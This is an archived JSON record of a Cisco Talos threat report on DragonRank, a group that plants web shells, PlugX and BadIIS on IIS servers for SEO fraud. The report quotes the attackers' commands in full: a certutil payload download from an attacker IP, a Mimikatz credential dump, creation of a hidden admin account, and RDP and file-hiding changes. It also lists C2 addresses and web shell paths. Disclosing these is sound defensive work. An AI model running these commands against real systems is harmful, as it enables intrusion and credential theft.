{ "id": "97001758-9382-4e40-8f40-9cfffda41ce5", "created_at": "2026-04-06T00:12:54.179468Z", "updated_at": "2026-04-10T03:28:05.498619Z", "deleted_at": null, "sha1_hash": "aed0ac6f04dadb7af3e3186d6a8173a3bd372ec1", "title": "DragonRank, a Chinese-speaking SEO manipulator service provider", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2103022, "plain_text": "DragonRank, a Chinese-speaking SEO manipulator service provider\r\nBy Joey Chen\r\nPublished: 2024-09-10 · Archived: 2026-04-02 11:07:40 UTC\r\nTuesday, September 10, 2024 00:00\r\nKey Takeaways \r\nCisco Talos is disclosing a new threat called “DragonRank” that primarily targets countries in Asia and a few in\r\nEurope, operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation.  \r\nDragonRank exploits targets’ web application services to deploy a web shell and utilizes it to collect system\r\ninformation and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities. \r\nTheir PlugX not only used familiar sideloading techniques, but the Windows Structured Exception Handling (SEH)\r\nmechanism ensures that the legitimate file can load the PlugX without raising suspicion. \r\nWe have confirmed more than 35 IIS servers had been compromised and deployed the BadIIS malware across a\r\ndiverse array of geographic regions, including Thailand, India, Korea, Belgium, Netherlands and China in this\r\ncampaign. \r\nTalos also discovered DragonRank’s commercial website, business model and instant message accounts. We used this\r\ninformation to assess with medium to high confidence the DragonRank hacking group is operated by a Simplified\r\nChinese-speaking actor.  \r\nVictimology: Countries, verticals and what is happening \r\nTalos has recently uncovered a cluster of activity we’re calling “DragonRank” distributed across a diverse array of\r\ngeographic regions, including Thailand, India, Korea, Belgium, Netherlands and China. They have cast a wide net in terms\r\nof industries, encompassing sectors such as jewelry, media, research services, healthcare, video and television production,\r\nmanufacturing, transportation, religious and spiritual organizations, IT services, international affairs, agriculture, sports, and\r\neven niche markets like feng shui. This broad spectrum of targets indicates a wide-reaching and non-targeted approach to\r\ntheir operations.  \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 1 of 18\n\nThese activities employ tools and tactics, techniques, and procedures (TTPs) typically linked to Simplified Chinese-speaking\r\nhacking groups. The hacking group’s primary goal is to compromise Windows Internet Information Services (IIS) servers\r\nhosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is a malware used to manipulate\r\nsearch engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can\r\ndistribute the scam website to unsuspecting users. \r\nThe threat actor engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's\r\nranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent\r\ncontent, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company's online\r\npresence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices. \r\nThe actor takes the compromised websites and promotes them, effectively turning these sites into platforms for scam\r\noperations. The scam websites we observed in this campaign utilize keywords related to porn and sex, and the configuration\r\ndata of the keywords from the command and control (C2) servers have been translated to multiple languages. Talos has\r\nconfirmed more than 35 IIS servers had been compromised and acted as a conduit for this attack. The following example\r\npictures show the configured data from C2 server and infected scam websites we observed from search engine results. \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 2 of 18\n\nWho they are \r\nThe findings revealed that DragonRank is actively engaging in black hat SEO practices to promote their business online,\r\nthereby boosting their clients' internet visibility by unethical means. However, we discovered that the DragonRank hacking\r\ngroup operates differently from traditional black hat SEO cybercrime groups. These groups usually compromise as many\r\nwebsite servers as possible to manipulate search engine traffic, but DragonRank emphasizes lateral movement and privilege\r\nescalation. Their objective is to infiltrate additional servers within the target's network and maintain control over them. We\r\nassess that they are relatively new to the black hat SEO industry, and they functioned more as a hacking group specializing\r\nin targeted attacks or penetration testing in the past.   \r\nBased on the objective DragonRank and the C2 servers extracted from their PlugX malware, we utilized relevant keywords\r\nto conduct a search engine investigation. For instance, searching \"tttseo.com\" on Google showed numerous instances of\r\nDragonRank’s advertisements, which had been inserted across various legitimate websites. The content of these ads\r\nconsistently centered on methods for black hat SEO services. By altering our IP address to appear as if we were accessing\r\nthe internet from another country (we used Japan as an example), we conducted keyword searches which confirmed that\r\nDragonRank has disseminated their targeted keywords globally. Additionally, it has come to our attention that the actor is\r\noffering services for bulk posting on social media platforms. \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 3 of 18\n\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 4 of 18\n\nWe reveal the DragonRank commercial website that provides a Chinese and English version of their business model.\r\nAccording to their introduction, their business includes white hat SEO and black hat SEO advertising channels, including\r\ncross-site ranking, single-site ranking, parasite ranking, extrapolation ranking, and search result dominance. DragonRank’s\r\nactivity also covers over 200 countries and regions worldwide and can support large amounts of industry-wide advertising.  \r\n Talos also observed DragonRank sharing their contact information on Telegram and the QQ instant message application,\r\nwhich allows users to contact them and conduct underground business trades. This allowed us to collect information and\r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 5 of 18\n\nuncover several business models and cybercrime evidence from the origin of the attacker. First, the account name is “天天推\r\n工作室” and the icon is “校长工作室”, although the names are different from two places, the meaning of them are all\r\nrepresent as a studio, which means they likely have the same motivations as any other traditional business. They also\r\nincluded a cautionary note stating to \"make sure of the transaction confirmation address, as we will not be held accountable\r\nfor any incorrect payments!\" in their account biography.  \r\n This disclaimer gives us high confidence that DragonRank conducts their cybercriminal activities by receiving payments\r\nfrom customers. These adversaries also offer seemingly quality customer service, tailoring promotional plans to best fit their\r\nclients' needs. Customers can submit the keywords and websites they wish to promote, and DragonRank develops a strategy\r\nsuited to these specifications. The group also specializes in targeting promotions to specific countries and languages,\r\nensuring a customized and comprehensive approach to online marketing.  \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 6 of 18\n\nAlthough we are not entirely certain of the original attacker's location, given that the Telegram phone number is from\r\nThailand, Talos assesses with medium to high confidence that we attribute the DragonRank hacking group to Simplified\r\nChinese-speaking actors. The creators of the website stated that China is the “mainland,” which further bolsters our\r\nconfidence assessment. This actor also operates PlugX as their backdoor malware which is a well-known backdoor that is\r\nused by multiple Chinese threat actors. Perhaps most importantly, the group uses Simplified Chinese in its promoted\r\nwebsite, and their customer service uses Simplified Chinese to speak with customers.  \r\nThe attack chain of this campaign \r\nIn this campaign, the initial entry points leveraged by the DragonRank hacking group is to take advantage of vulnerabilities\r\nin web application services, such as phpMyAdmin, WordPress, or similar web applications. Once DragonRank obtains the\r\nability to execute remote code or upload files on the targeted site, they proceed to deploy a web shell. This grants them\r\ncontrol over the compromised server, marking their initial foothold. The following is a screenshot, and the detected location\r\nof the web shell used in this campaign, which is identified as the open-source ASPXspy web shell. \r\nC:\\phpMyAdmin\\shell.aspx \r\nC:\\AWStats\\wwwroot\\shell.aspx \r\nAfter dropping the web shell, the group was seen utilizing it to collect system information and launch malware such as\r\nPlugX and BadIIS, as well as to run various credential-harvesting utilities that include Mimikatz, PrintNotifyPotato,\r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 7 of 18\n\nBadPotato and GodPotato. The commands used by the attacker to gather system details and dump credentials are provided\r\nbelow.  \r\nMITRE \r\ncmd /c cd /d C:\\phpMyAdmin\"\u0026netstat -an | find ESTABLISHED\u0026echo [S]\u0026cd\u0026echo [E]  T1016 \r\ncmd /c cd /d C:\\phpMyAdmin\"\u0026tasklist\u0026echo [S]\u0026cd\u0026echo [E]  T1057 \r\ncmd /c cd /d C:\\phpMyAdmin\"\u0026whoami\u0026echo [S]\u0026cd\u0026echo [E]  T1033 \r\nnet localgroup administrators  T1069.001 \r\ncmd /c cd /d C:/Windows/SysWOW64/inetsrv/\u0026systeminfo 2\u003e\u00261  T1082 \r\ncmd /c cd /d C:/Windows/SysWOW64/inetsrv/\u0026C:/ProgramData/pp888.tmp whoami 2\u003e\u00261  T1555 \r\ncmd /c cd /d C:/Windows/SysWOW64/inetsrv/\u0026C:/ProgramData/BadPotato.exe whoami 2\u003e\u00261  T1555 \r\ncmd /c cd /d C:/Windows/SysWOW64/inetsrv/\u0026C:/ProgramData/GodPotato-NET4.exe -cmd whoami\r\n2\u003e\u00261  \r\nT1555 \r\nDragonRank also breaches additional Windows IIS servers in the target’s network, either through the deployment of web\r\nshells or by exploiting remote desktop logins using acquired credentials. After accessing the other Windows IIS servers, the\r\nadversaries employ a web shell or Remote Desktop Protocol (RDP) to install PlugX, BadIIS, tools for credential dumping,\r\nand a user cloning utility tool with the aim of maintaining a low profile and ensuring persistence within their network. We\r\nalso notice on one of the compromised servers that DragonRank uses a utility tool to clone an administrator's permissions to\r\na guest account to elevate a guest account to have administrator privileges within a compromised system and execute the\r\ncredential-dumping tool. The full attack chain diagram is shown below.  \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 8 of 18\n\nFive months following the initial breach, DragonRank re-engaged with one of the previously compromised IIS servers with\r\na previously deployed web shell to verify its operational status and ensure the server still possessed the necessary\r\npermissions required for their activities. The verification process involved several steps: downloading a web shell onto the\r\nsystem, retrieving the host name and acquired credentials, adding a hidden administrator account, denoted as “admin$”,\r\ndisabled and re-enabled RDP to facilitate remote control and cover their tracks by deleting the “admin$” account in the end.\r\nThe following commands are shown below. \r\nCommand  MITRE \r\ncertutil.exe -urlcache -split -f http://35.247.175[.]184:443/1.aspx C:\\HostingSpaces\\[REDACTED]\\\r\n[REDACTED].co.th\\wwwroot\\1.aspx  \r\nT1105 \r\ncmd /c whoami  T1033 \r\nC:\\Windows\\System32\\rundll32.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"  T1555 \r\ncmd /c reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections\r\n/t REG_DWORD /d 0 /f \r\nT1021.001 \r\n\"cmd\" /c \"cd /d \"c:/windows/system32/inetsrv/\"\u0026netstat -an\" 2\u003e\u00261  T1016 \r\ncmd /c net user admins$ admin@123... /add  T1136 \r\ncmd /c net localgroup administrators admins$ /add  T1098 \r\ncmd /c reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections\r\n/t REG_DWORD /d 1 /f \r\nT1021.001 \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 9 of 18\n\ncmd /c net user admins$ /del  T1070 \r\nMalware analysis \r\nPlugX \r\nPlugX serves as the primary backdoor used by this hacking group in this campaign. They utilized DLL sideloading\r\ntechnique, exploited vulnerable legitimate binaries to initiate the PlugX loader, which is consistent with the method\r\ndescribed in this report. We have outlined the execution flow of the PlugX malware based on our telemetry data and the\r\npayload that was discovered on VirusTotal. \r\nAlthough this PlugX relies on the familiar sideloading technique with previous PlugX loaders, there still have a few\r\nsignificant modifications to the PlugX loader component in this campaign. The first one is about the loader using the\r\n\"TopLevelExceptionFilter\" function — a SEH mechanism for managing top-level exceptions — to ensure the legitimate file\r\ncan effectively load the PlugX loader. This technique ensures that the legitimate file can load the PlugX loader without\r\nraising suspicion. By integrating with SEH, PlugX can intercept exceptions that occur during program execution, which can\r\nbe used as a form of error handling or to obfuscate malicious activities. Leveraging the built-in exception handling\r\nmechanism of Windows to bypass security measures, making it more difficult for antivirus products and other security tools\r\nto detect malicious behavior. The use of SEH by PlugX demonstrates the sophistication of the malware and ensures their\r\nPlugX malware is persistent and stealth within a compromised system. \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 10 of 18\n\nWhen the PlugX loader is successfully sideloaded by the legitimate binary, the PlugX loader conducts its search for the\r\npayload in three distinct locations. The initial search area is the directory where the loader itself resides. The second location\r\nis within the system registry under \"HKEY_LOCAL_MACHINE\\SOFTWARE\\bINARy,\" specifically looking for the value\r\n\"Acrobat.dxe.\" The third location is a similar registry path but under \"HKEY_CURRENT_USER\\SOFTWARE\\bINARy,\"\r\nagain checking for the value \"Acrobat.dxe.\" Once the payload is found in any of these locations, the PlugX loader will\r\nproceed to load, decrypt using the XOR algorithm with the key \"0xD1,\" and then inject it into the virtual allocated memory\r\nblock. The PlugX payload will connect to the C2 server and execute in the memory to avoid being detected by the radar. \r\nFurther, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. During\r\nthis research and analysis, we discovered a similar PlugX loader that has the same system registry path, values and the same\r\nXOR algorithm with the key \"0xD1\" has been uploaded to VirusTotal. We used this instance of the PlugX loader that has\r\nbeen founded on VirusTotal, to retrieve a few original archived files and their download sites. Despite differences in the\r\narchived file's initial upload source and the countries involved, the PlugX loader and its associated payload proved to be\r\nidentical, with their hashes matching precisely.  \r\nSha256  Download site \r\nVT\r\nsubmit\r\ncountry \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 11 of 18\n\n046a03725df3104d02fa33c22e919cc73bed6fd6a905098e98c07f0f1b67fadb  https://admin1.tttseo[.]com/ht.zip  TAIWAN \r\n785d92dc175cb6b7889f07aa2a65d6c99e59dc1bbc9edb8f5827668fd249fa2e  N/A \r\nHONG\r\nKONG \r\nf748b210677a44597a724126a3d97173d97840b59d6deaf010c370657afc01f8  http://ddos.tttseo[.]com/ddos/ddos.zip  CHINA \r\nPlugX is a well-known remote access tool (RAT) equipped with modular plugins and property configurations that has been\r\ndeployed by various Chinese-speaking cyber threat actors for more than ten years. The PlugX configuration in this campaign\r\ncontains all the necessary values and information to properly run the executable. We extracted all the configuration field and\r\nvalue information from the pivot samples on VirusTotal. Below are the following fields contained in the PlugX\r\nconfiguration. \r\n1. C2 Address: mail.tttseo[.]com:53  \r\n2. Persistence Type: Service + Run Key \r\n3. Install Dir: %ALLUSERSPROFILE%\\Adobe\\Player\\ \r\n4. Service Name: Microsoft Office Document Update Utility \r\n5. Service Disp: Microsoft Office Document Update Utility \r\n6. Service Desc: Microsoft Office Document Update Utility  \r\n7. Registry hive: 02000080 \r\n8. Registry key: Software\\Microsoft\\Windows\\CurrentVersion\\Run \r\n9. Registry value: MODU \r\n10. Injection: True \r\n11. Injection process: %windir%\\system32\\svchost.exe \r\n12. Injection process: %windir%\\system32\\winlogon.exe \r\n13. Injection process: %windir%\\system32\\LoginUI.exe \r\n14. Injection process: %windir%\\system32\\svchost.exe \r\n15. Injection process: %windir%\\system32\\rundll32.exe \r\n16. Injection process: %windir%\\system32\\dllhost.exe \r\n17. Injection process: %windir%\\system32\\msiexec.exe \r\n18. Online Pass: chinatongyi2022 \r\n19. Memo: fish \r\n20. Mutex: Global\\MckZoZkywaEap \r\n21. Screenshots: False \r\n22. Screenshots params: 10 sec / Zoom 50 / 16 bits / Quality 50 / Keep 3 days \r\n23. Screenshots path: %AUTO%\\DSSM\\screen \r\nWe also discovered the same PlugX loader and payload in a file named \"ddos.zip,\" which is disguised as a tool for managing\r\nDDoS attacks. However, all the files within this compressed archive are different variants of PlugX loader. This behavior\r\nsupports our assessment that this hacking group might be new to the cybercrime industry, as they show little concern for\r\nmaintaining a reputable facade. Additionally, the archive includes an application manual designed to lure users into\r\ninadvertently executing the malware, under the guise of operating a DDoS tool. The file consists of two subfolders, one\r\nmasquerading as a server-side control interface and the other as a client-side installation utility. Both folders contain\r\ndifferent versions of the PlugX loader malware but the same PlugX payload. The first variant of the PlugX loader is identical\r\nto which has been examined in this case, while the other utilizes a digitally signed driver to facilitate the execution of the\r\nPlugX payload. The operational details of this second variant about digitally signed driver PlugX are in line with the\r\ndescriptions provided in this analysis. Additionally, the application's manual and the name of the folder are in Simplified\r\nChinese, leading us to conclude that this decoy file is targeted at regions where Simplified Chinese is the spoken language. \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 12 of 18\n\nBadIIS \r\nTo manipulate the search engine crawlers and hyperlink jump, the threat actor deployed a previously seen malware BadIIS ,\r\nwhich was previously talked at Black Hat USA 2021. There is a medium confidence that the BadIIS observed in this\r\ncampaign is associated with the entity referred to as Group 9 in the Black Hat presentation. The version of BadIIS we've\r\ndetected shares similar traits with the one mentioned at the conference, including the configuration as an IIS proxy and\r\ncapabilities for SEO fraud. \r\nGroup 9's IIS proxy is specifically relayed to facilitate C\u0026C communications between infected hosts and their C\u0026C server.\r\nAlso, this malware family can SEO fraud by altering HTTP responses from the compromised IIS servers to search engine\r\ncrawlers. This allows attackers to manipulate search engine rankings, artificially inflating the SEO of specific third-party\r\nwebsites by exploiting the credibility of the sites hosted on the breached web server. While the behavior and tactics of the\r\nBadIIS malware are largely consistent, we have noted a few distinctions that set the current variant apart, which we have\r\nidentified and list down here. \r\nTarget China search engines, e.g.: sogou, baidu, 360, etc. \r\nTarget well-known search engines, e.g.:\r\ngoogle, yahoo, bingbot, etc. \r\nDifferent URL path, e.g.: /zz.php, /zz1.php, /zk.php, /pq.php,\r\n/wh1.php, /zid.php, /xin.html, /zy.php  \r\nOnly two URL path, e.g.: /zz1.php, /xx1.php \r\nAfter analyzing other available samples with an execution sequence in this campaign, filenames identical to the malicious\r\nactivity we observed and possibly related to the attack we observed from another campaign. We have uncovered several\r\nimportant discoveries through our research, and these will be detailed sequentially in this section. \r\nOur initial observation reveals that the DragonRank hacking group tends to install the BadIIS malware in certain file\r\nlocations. For instance, they attempt to place BadIIS within directories named \"Kaspersky SDK,\" likely as a tactic to evade\r\ndetection by security software. The file paths we observed are as follows: \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 13 of 18\n\nC:/ProgramData/Kaspersky SDK/IISMODEx86.dll \r\nC:/ProgramData/Kaspersky SDK/IISMODEx64.dll \r\nC:/ProgramData/IISMODEx64.dll \r\nC:/ProgramData/IISMODEx86.dll                            \r\nAdditionally, Talos has observed that the BadIIS malware samples contain Program Database (PDB) strings as well as\r\ntimestamps indicating when they were compiled. The BadIIS malware variants were compiled between April and August\r\n2023. The PDB strings to these samples were found listed below: \r\nC:\\Users\\Administrator\\Desktop\\dll\\Release\\HttpModRespDLLx64.pdb \r\nC:\\Users\\Administrator\\Desktop\\dll\\Release\\HttpModRespDLLx86.pdb \r\nC:\\Users\\Administrator\\Desktop\\HttpModRespDLL\\Release\\HttpModRespDLLx64.pdb \r\nC:\\Users\\Administrator\\Desktop\\HttpModRespDLL\\Release\\HttpModRespDLLx86.pdb \r\nC:\\Users\\Administrator\\Desktop\\HttpModRespDLL\\Release\\x64\\HttpModRespDLLx64.pdb \r\nBased on our analysis of these matching samples and telemetry from our secure agent, the execution sequence has two\r\nparts: \r\nExecute “1.bat” a batch file to install BadIIS \r\nThe discovery of the \"1.bat\" script file guided us to a blog post that revealed the source code for the BadIIS malware. This\r\npost not only shared the source code and objectives of BadIIS but also included a well-organized batch script, enabling users\r\nto easily install the BadIIS on IIS servers. The main purpose of this batch script is to configure the IIS module to install the\r\nmalicious BadIIS payload. It leverages the appcmd.exe utility to modify the IIS configuration and copy BadIIS module files\r\nwithin the \"%windir%\\Microsoft.NET\\Framework64\" directory. Upon completion of these modifications, it proceeds to\r\nrestart the IIS services to enact the changes.  \r\nTalos observed the DragonRank hacking group has added two additional commands in the install script file “1.bat”, shown\r\non the below. Our assessment suggests that the proxy functionality of BadIIS may no longer have the capability to compress\r\nthe output produced by scripts, executables, or static files such as HTML, CSS, JavaScript, and images. To successfully\r\nrelay the compromised server and C\u0026C servers’ communication, the threat actor disables the IIS dynamic and static\r\ncompress function. \r\nC:\\Windows\\system32\\inetsrv\\appcmd.exe set config /section:urlCompression /doStaticCompression:false \r\nC:\\Windows\\system32\\inetsrv\\appcmd.exe set config /section:urlCompression /doDynamicCompression:false \r\nIn one of the compromise servers in this campaign, we also observed the DragonRank hacking group use the following\r\ncommand to modify the file attributes of BadIIS malware in an attempt to conceal the file and make it more difficult to\r\ndetect or alter. \r\nattrib +a +s +r +i +h C:\\Windows\\Microsoft.NET\\HttpResetModule.dll \r\nattrib +a +s +r +i +h C:\\Windows\\Microsoft.NET\\HttpResetModule64.dll \r\nMalicious IISMODEx86.dll/IISMODEx64.dll malware \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 14 of 18\n\nUpon analyzing the signature of the malware, it shares similarities with the activities described in the black hat USA 2021\r\ntalk on \"Group 9.\" The \"Group 9\" malware is designed to carry out Proxy and SEO fraud, consistent with the actions\r\ndetailed in the report. However, the SEO fraud and proxy function in this campaign are a little bit different from Group 9’s\r\nBadIIS variant. The SEO fraud initialization will also catch the incoming HTTP requests whose User-Agent header matches\r\nthe search engine crawler, but the crawler pattern is not identical with the report, below is the BadIIS search engine crawler\r\nbot pattern that we observed in this campaign: \r\n(MJ12bot|msnbot|Yahoo|bingbot|google|YandexBot|DotBot|exabot|ia_archiver|Teoma|AhrefsBot|SemrushBot|Speedy|yandex|LinkpadB\r\nThe proxy feature of the BadIIS malware is configured to permit access to certain URL paths or restrictions on specific file\r\ntypes, based on their file extensions. Once the request matches with BadIIS restrictions, the BadIIS will transfer the request\r\nto C\u0026C server with “/zz1.php” URL path. \r\nIf a request fails to match the designated URL path or include a disallowed file extension, the proxy tool redirects the traffic\r\nto a C\u0026C server with a different path “/xx1.php”, send the incoming request host name, URL path and its domain name to\r\nC\u0026C server, as illustrated below. Additionally, the URI parameters in the BadIIS malware are exactly the same as the blog\r\npost source code which also provides us with further evidence that the BadIIS we found was modified from there. \r\nhttp://a.googie[.]pw/xx1.php?host=www.[REDACTED][.com\u0026reurl=/wp-content/uploads/2023/\u0026domain=www.\r\n[REDACTED].com \r\nWe also identify that the BadIIS malware will pretend to be a Google search engine crawler in its User-Agent when it relays\r\nthe connection to the C\u0026C server. This could help the threat actor avoid network security product alerts and easily bypass\r\nsome weaker security website measures. \r\nThe BadIIS malware we already confirm affects neither the compromised server nor the server’s users. However, it poses a\r\nthreat to users of third-party websites by acting as a conduit for phishing attacks. BadIIS leverages an Internet Server\r\nApplication Programming Interface (ISAPI) DLL to take control of all HTTP requests sent to the hosted websites and to\r\nmodify the server's HTTP responses strategically. The malware engages in SEO deception on the infected IIS servers to\r\nboost the visibility of a third-party fraudulent website, specifically targeting and influencing the behavior of certain search\r\nengine crawlers as detailed in the blog post. Below is the network request flow of the BadIIS operating mechanism in this\r\ncampaign.  \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 15 of 18\n\nAssembly web shell \r\nWe performed a pivot analysis of the C\u0026C IP associated with PrintNotifyPotato using VirusTotal and other malware cloud\r\nrepositories. Through this analysis, we discovered four distinct versions of ASP.NET compiled DLLs that embedded\r\nMetasploit and tried to connect the same C\u0026C we found. These DLL files typically appear when ASP.NET compiles .aspx\r\nfiles into assemblies, a process that occurs upon the first access to the .aspx file, with ASP.NET saving the resulting\r\nassemblies in a temporary directory. \r\nThe DLL web shell has several functions embedded, Metasploit reverse shell, Godzilla web shell and ASPXSpy web shell.\r\nBelow we list down the web shell file path and its compare functions. \r\nversion_1_metasploit_path = \"/Templates/Include/nc.aspx\" \r\nversion_2_metasploit_path = \"/730file/new.aspx\"  \r\nversion_2_metasploit_path = \"/alx/new.aspx\" \r\nversion_3_metasploit_path = \"/upload/20231027/32.aspx” \r\nversion_3_Godzilla_path = \"/upload/20231027/40222049595830.aspx” \r\nversion_4_metasploit_path = \"/comm/32.aspx\" \r\nversion_4_404image_path = \"/comm/Image.aspx\" \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 16 of 18\n\nversion_4_ASPXSpy_path = \"/comm/list.aspx\" \r\nAlthough the ASPXSpy web shell function is open source on GitHub, the specific version of ASPXSpy we identified\r\nmatches exactly with the one used in this campaign. \r\nASPXSpy web shell in this campaign (left) and web shell in compiled DLLs (right). \r\nCoverage \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in\r\nthis post. Try Secure Endpoint for free here. \r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here. \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure\r\nproducts. \r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network. Sign up for a free trial of Umbrella here. \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests\r\nsuspicious sites before users access them. \r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center. \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org. Snort SID for this threat is – 63953 and 63954. \r\nClamAV detections are also available for this threat: \r\nWin.Trojan.Explosive-ASP-6510859-0  \r\nAsp.Trojan.Webshell-6993264-0 \r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 17 of 18\n\nWin.Tool.GodPotato-10019688-1  \r\nWin.Malware.Mimikatz-10034728-0  \r\nWin.Tool.PrintNotifyPotato-10034729-0  \r\nWin.Tool.UserClone-10034730-0  \r\nWin.Malware.BadIIS-10034755-0  \r\nWin.Trojan.PlugX_Payload-10034756-0  \r\nWin.Trojan.PlugXLoader-10034757-0  \r\nWin.Trojan.PlugXKernelDriver-10034758-0  \r\nWin.Trojan.Mimikatz-6466236-2  \r\nWin.Tool.BadPotato-9819486-2 \r\nIndicator of compromise \r\nIndicators of Compromise associated with this threat can be found here.\r\nSource: https://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nhttps://blog.talosintelligence.com/dragon-rank-seo-poisoning/\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://blog.talosintelligence.com/dragon-rank-seo-poisoning/" ], "report_names": [ "dragon-rank-seo-poisoning" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "0e62ad61-c51d-460e-a587-b11d17bb2fb3", "created_at": "2024-10-04T02:00:04.754794Z", "updated_at": "2026-04-10T02:00:03.712878Z", "deleted_at": null, "main_name": "DragonRank", "aliases": [], "source_name": "MISPGALAXY:DragonRank", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434374, "ts_updated_at": 1775791685, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/aed0ac6f04dadb7af3e3186d6a8173a3bd372ec1.pdf", "text": "https://archive.orkl.eu/aed0ac6f04dadb7af3e3186d6a8173a3bd372ec1.txt", "img": "https://archive.orkl.eu/aed0ac6f04dadb7af3e3186d6a8173a3bd372ec1.jpg" } }